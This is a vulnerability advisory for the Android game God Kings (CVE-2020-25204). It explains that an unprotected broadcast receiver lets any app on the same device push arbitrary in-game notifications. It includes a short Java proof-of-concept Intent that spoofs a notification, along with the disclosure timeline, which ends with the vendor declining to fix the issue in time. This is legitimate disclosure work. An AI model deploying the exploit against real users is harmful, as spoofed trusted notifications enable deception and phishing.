Get in touch

God Kings "com.innogames.core.frontend.notifications.receivers.LocalNotificationBroadcastReceiver" Improper Authorization Allowing In-Game Notification Spoofing

Oct 25, 2020 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: God Kings
  • Vendor URL: https://www.innogames.com
  • Type: Improper Verification of Intent by Broadcast Receiver [CWE-925]
  • Date found: 2020-09-07
  • Date published: 2020-10-25
  • CVSSv3 Score: 5.5 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)
  • CVE: CVE-2020-25204

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

God Kings 0.60.1 (latest)

INTRODUCTION

IT’S TIME TO BECOME THE WORLD’S GREATEST KING!! Compete on the ultimate battleground against epic monsters and tyrannical enemy kings in the vast 3D world of God Kings! Raise an eternal empire and build an army, the likes of which have never been seen! Your strategy, your victory! Summon legendary Guardians and unleash devastating damage upon all those who stand opposed! Join forces with other strong kingdoms and grow your influence on the battlefield together!

(from the vendor’s homepage)

VULNERABILITY DETAILS

The “God Kings” app for Android exposes a broadcast receiver to other apps called “com.innogames.core.frontend.notifications.receivers.LocalNotificationBroadcastReceiver”. The purpose of this broadcast receiver is to receive and display in-game push notifications to the player.

However, the app does not enforce any authorization schema on the broadcast receiver, thus allowing an attacker (malicious app) to send fully customizable in-game push notifications to the player. An exemplary exploit could look like the following:

Intent i = new Intent();
i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
i.setComponent(new ComponentName("com.innogames.gkandroid", "com.innogames.core.frontend.notifications.receivers.LocalNotificationBroadcastReceiver"));
i.setAction("android.intent.action.MAIN");

Bundle bundle = new Bundle();
bundle.putString("title", "title");
bundle.putString("body", "body");
bundle.putString("tickerText", "tickerText");
bundle.putString("smallIcon" ,"smallIcon");
bundle.putString("largeIcon", "largeIcon");
bundle.putBoolean("displayedInForeground", true);

UserInfo userinfo = new UserInfo("1", "2");
bundle.putParcelable("user_info", userinfo);

i.putExtra("NotificationExtra", bundle);
sendBroadcast(i);

RISK

A malicious app on the same device is able to exploit this vulnerability to show arbitrary in-game push notifications to the player. The specific problem here is the assumed trust boundary between the user having the God Kings app installed and what the app is actually doing/displaying to the user. So if the player sees the in-game notification, it can be assumed that the shown content is also trusted by the user.

SOLUTION

None

REPORT TIMELINE

  • 2020-09-07: Discovery of the vulnerability
  • 2020-09-08: CVE requested from MITRE
  • 2020-09-08: Contacted vendor via their security@
  • 2020-09-08: Response from vendor
  • 2020-09-09: MITRE assigns CVE-2020-25204
  • 2020-09-09: Sent a full apk PoC to exploit this issue
  • 2020-09-17: Vendor states that they’re working on a fix, but the initial disclosure deadline cannot be met
  • 2020-09-17: Disclosure deadline extended to 24th October 2020
  • 2020-09-25: Vendor states that they’ve decided not to fix this issue in due time
  • 2020-10-25: Public disclosure

REFERENCES

None